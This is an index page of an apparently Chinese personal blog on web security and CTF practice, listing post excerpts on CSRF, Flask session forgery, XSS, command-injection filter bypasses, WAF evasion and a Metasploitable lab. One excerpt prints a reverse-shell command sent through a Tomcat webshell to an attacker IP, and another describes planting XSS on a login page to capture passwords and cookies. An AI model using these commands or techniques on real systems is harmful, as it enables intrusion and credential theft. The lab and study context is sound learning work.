AU9U5T's blog
  • Home
  • Archives
  • Categories
  • Tags
  • About

csrf

MindMaphttps://www.zhixi.com/view/4af8e25c 图片 大纲:csrf形成原因没有检测referer只检测了cookie 但是并没有检测随机值token对于请求参数是可以猜测得到的漏洞挖掘重点关注referer ,如果删了或者修改referer 还是可以访问成功,那么就是可行的修改密码,刷关注数,绑定邮箱等地 利用方法前提用户登录,保证cookie 有效
2024-05-09
#整理

flask

简介flask 是模板注入的一种,flask 使用的是jinjia2 模板引擎 题型session 伪造0x00 session 结构 session_data+timestamp+hash 我们就是需要通过获取hash 然后伪造这个session 通常情况下,我们伪造的身份应该是admin 或者是root 值得注意的是timestamp+session_data 一般都是base64 编码
2024-05-06
#CTF

php

[MoeCTF 2022]ezphp0x00 使用知识点 变量覆盖 0x01 源码分析 12345678910111213141516171819202122232425262728<?phphighlight_file('source.txt');echo "<br><br>";$flag = 'xxxxxxxx
2024-05-02
#CTF刷题记录

xss

xmindhttps://www.zhixi.com/view/f03dc04b 图片 大纲:XSS形成原因服务器没有对用户的输入做良好的过滤,以至于执行黑客的js 代码挖掘方法留意能将我们的输入展示出来的地方分类反射型xss这个多用于钓鱼存储型xss这种多用于博客,论坛,留言板当中,在发帖的过程中嵌入XSS攻击代码,帖子被目标服务器存储在数据库当中,当用户进行正常的额访问时,触发XSS代
2024-05-02
#整理

web权限维持

使用xss 既然已经获取了web 权限,可以尝试在某一个登录页面插入xss 代码 例如 登录就会访问?user&password? 这样的url 那么只要登陆就会将其 密码获取(表单截取),还有一种cookie截取
2024-04-29
#渗透

Metasploitable1

信息收集 端口信息收集 漏洞8180-tomcat 弱密码 上传war 包 1http://192.168.79.186:8180/cmd/cmd.jsp?cmd=/bin/sh -i >& /dev/tcp/192.168.79.137/19999 0>&1 发现不行,尝试使用nc 进行反弹shell 1http://192.168.79.18
2024-04-28
#靶场记录

无字母rce

异或^异或的规则是将两个数拿来异或的话,相同的话就为0,不相同就为1 在php中两个字符相异或之后还是字符,所以我们可以选择两个不是字母的字符进行异或从而得到我们需要的 使用 [HUBUCTF 2022 新生赛]HowToGetShell 举例 首先查看源码 1234567<?phpshow_source(__FILE__);$mess=$_POST['mess'];if
2024-04-27
#CTF

rce总结

替代cat rev nl less tac highlight_file() show_source() include ls 替代 exa flag绕过 f??? f”lag f/lag f”lag ./显示当前的flag
2024-04-26
#CTF

奇技淫巧

空格绕过 ${IFS} $IFS$9 < <> {,}
2024-04-26
#CTF

waf绕过思路总结

引言首先有一个问题,什么是waf waf 的全称是:Web Application Firewall 可以这个是web 应用的防火墙,但是和传统的防火墙有什么区别呢? 放置位置 IDS: 入侵检测系统 IPS: 入侵防御系统 WAF: Web应用程序防火墙 osi 模型中的位置 传统防火墙工作在传输层和网络层(3,4)层 waf 工作于应用层,同时能够向下兼容网络防火墙 工作
2024-04-26
#渗透
1…910111213…35

Search

github 随笔
Views: Visitors: